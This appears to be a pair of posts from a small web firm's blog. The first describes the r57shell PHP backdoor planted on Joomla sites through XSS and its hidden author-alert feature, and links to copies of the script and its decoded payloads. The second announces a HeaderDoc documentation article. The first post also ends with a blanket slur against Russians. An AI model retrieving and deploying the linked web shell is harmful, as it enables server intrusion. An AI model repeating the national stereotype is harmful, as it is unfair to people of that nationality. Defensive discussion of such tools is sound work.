Joomla, XSS and Obfuscated Code

Hello again,

Yesterday, our chief engineer Ben, came about an interesting backdoor php script that a friend off irc was talking about. He was studying the joomla source, prior to implementation, and found that tons of joomla sites had been owned with a XSS used to load the r57shell php script.

We've included a copy of the script here for educational purposes: http://www.projectskyline.com/phplist/r57shell.txt

Ben went and posted this information to the NYPHPlist to provide fellow developers
an insight into the tools crackers are using against us.

A member of the PHPList pointed out that the script has some backdoor, author alerting features: http://seclists.org/fulldisclosure/2006/Sep/0083.html

Ben decided to base64_decode( ) the obfuscated variables and see what kinds of programs the
shellscript was building and executing.

The first section of code is that of the author alert...this provides the author w/the ip of the owned machine.

Ben then went ahead and decode the programs...a link to them is here:
http://www.projectskyline.com/phplist/test.php

Can't trust those russians!

- psl

TechTrax Article Debut

Hello all,

Our first TechTrax article has debuted! ProjectSkyLine' chief engineer Ben has written a great article, 'Automatically Generate Documentation for Source Code with HeaderDoc', which explains how to setup a mechanism for generating source code documentation for any project (PHP is the example).

The same technique debuted in the article is used here at PSL. Because of the size of our clients projects, we need up to date, detailed and accurate project documentation.

In other news, we've landed a large job for 'mash up' of types. A beta will be released in a few months so stay tuned. Not much else can be announced...its a skunk works project!

See you soon!

- psl